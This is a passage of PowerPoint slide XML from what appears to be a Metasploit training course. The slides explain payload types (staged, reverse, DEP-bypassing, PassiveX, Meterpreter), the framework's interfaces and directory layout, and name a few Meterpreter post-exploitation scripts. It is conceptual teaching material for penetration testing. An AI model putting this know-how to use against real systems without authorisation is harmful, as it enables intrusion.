      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731"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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – Shellcode to be executed is delivered in one block.   Single payload stage.    Disadvantage is that it might be too big to deliver in a single stage.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Staged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – The first payload is just a small stub which then grabs the reset of the shellcode.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – Instead of the attacker connecting to the payload on the exploited host.    The payload on the exploited host connects back to the attack.   Good for inside firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NoNx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – These payloads are designed specifically to circumvent DEP (Data Execution Protection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PassiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – Some outbound firewall policies might restrict payload communication.  PassiveX uses an ActiveX control to create a hidden instance of Internet Explorer for outbound access.</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bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="990600"/>
            <a:ext cx="12204700" cy="79375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More About Payloads (cont)	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755"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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IPv6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – All payloads in Metasploit are designed to work over IPv6.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – the “mother of all payloads”  Short for Meta-Interpreter. </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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="990600"/>
            <a:ext cx="12204700" cy="78105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Metasploit Interfaces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75779" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4905375" y="5678488"/>
            <a:ext cx="2638425" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75780" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5046663" y="7751763"/>
            <a:ext cx="2357437" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSFGUI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75781" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9040813" y="5640388"/>
            <a:ext cx="2709862" cy="2041525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75782" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9024938" y="7713663"/>
            <a:ext cx="2495550" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSFWeb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75783" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="687388" y="1960563"/>
            <a:ext cx="2889250" cy="1979612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75784" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="949325" y="4033838"/>
            <a:ext cx="2236788" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSFCLI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75785" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="677863" y="5640388"/>
            <a:ext cx="2698750" cy="2379662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75786" name="TextBox 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928688" y="8189913"/>
            <a:ext cx="1698625" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MSFd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75787" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9040813" y="1892300"/>
            <a:ext cx="3086100" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="75788" name="Group 1"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4346575" y="1960563"/>
            <a:ext cx="3640138" cy="3155950"/>
            <a:chOff x="4572354" y="1960563"/>
            <a:chExt cx="3640137" cy="3155950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="75790" name="Picture 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4572354" y="1960563"/>
              <a:ext cx="3640137" cy="2270125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75791" name="TextBox 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4704117" y="4340225"/>
              <a:ext cx="3376613" cy="776288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>MSFConsole</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75789" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9142413" y="4438650"/>
            <a:ext cx="2430462" cy="776288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Armitage</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bwMode="auto">
          <a:xfrm>
            <a:off x="482600" y="838200"/>
            <a:ext cx="11703050" cy="752475"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MsfConsole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{523DC952-1F55-4866-9FEA-1F81ECFAED1D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76804" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616200" y="1676400"/>
            <a:ext cx="7610475" cy="7521575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="990600"/>
            <a:ext cx="11703050" cy="828675"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MsfConsole Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3C00C936-68ED-434A-A8FD-4DF7E79A83B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77828" name="Content Placeholder 1"/>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Interactive console for Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tab completion (double tap)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can execute external commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most flexible interface</a:t>
            </a:r>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bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="914400"/>
            <a:ext cx="11703050" cy="828675"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Directory Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DD3C8BC-CA5D-4DC8-9243-55B1955F25AE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78852" name="Content Placeholder 1"/>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Modules – What we will mainly be working with.  Contains Exploits, aux, encoders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scripts – extension scripts.  Typically from 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" baseline="30000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> parties.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>“run checkvm”, “run getcountermeasure”, “run getgui” (Meterpreter scripts)	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Plugins – location for your own exploits develpment	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External – interfaces to external services such a serialports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data – data source for exploits. dictionaries, wordlists, sql, snmp mibs, etc.</a:t>
            </a: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bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="838200"/>
            <a:ext cx="11703050" cy="828675"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91435" tIns="45718" rIns="91435" bIns="45718" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Modules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A5853C6A-7B93-4248-8FAE-13772A55DB65}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79876" name="Content Placeholder 1"/>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auxiliary – tasks outside of direct exploitation such as port scanning, sniffing, etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
